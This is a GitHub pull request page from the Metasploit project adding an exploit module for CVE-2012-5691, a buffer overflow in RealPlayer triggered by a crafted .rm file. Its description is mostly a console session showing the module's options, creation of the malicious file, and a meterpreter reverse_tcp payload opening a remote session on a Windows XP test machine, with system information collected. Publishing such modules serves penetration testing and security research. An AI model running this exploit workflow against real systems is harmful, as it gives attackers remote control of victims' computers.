Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Added module for CVE-2012-5691 #1209

Merged
merged 2 commits into from Dec 26, 2012
Merged

Added module for CVE-2012-5691 #1209

merged 2 commits into from Dec 26, 2012

Conversation

jvazquez-r7
Copy link
Contributor

Initially published by suto via twitter:

https://twitter.com/toanphamvan/status/283388481873539072

Tested on windows xp sp3 / Real Player 15.0.5.109 (http://www.oldversion.com/windows/realplayer-15-0-5-109)

msf  exploit(real_player_rm_bof) > show options

Module options (exploit/windows/fileformat/real_player_rm_bof):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  msf.rm           no        The file name.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST     192.168.1.128    yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows XP SP3 / Real Player 15.0.5.109


msf  exploit(real_player_rm_bof) > rexploit
[*] Reloading module...

[+] msf.rm stored at /Users/juan/.msf4/local/msf.rm
msf  exploit(real_player_rm_bof) > use exploit/multi/handler 
msf  exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.128:4444 
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 192.168.1.147
[*] Meterpreter session 1 opened (192.168.1.128:4444 -> 192.168.1.147:1128) at 2012-12-25 18:01:20 +0100

meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.147 - Meterpreter session 1 closed.  Reason: User exit

@wchen-r7 wchen-r7 merged commit e895ccb into rapid7:master Dec 26, 2012
@jvazquez-r7 jvazquez-r7 deleted the realplayer_url_bof branch November 18, 2014 15:54
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
2 participants
@jvazquez-r7 @wchen-r7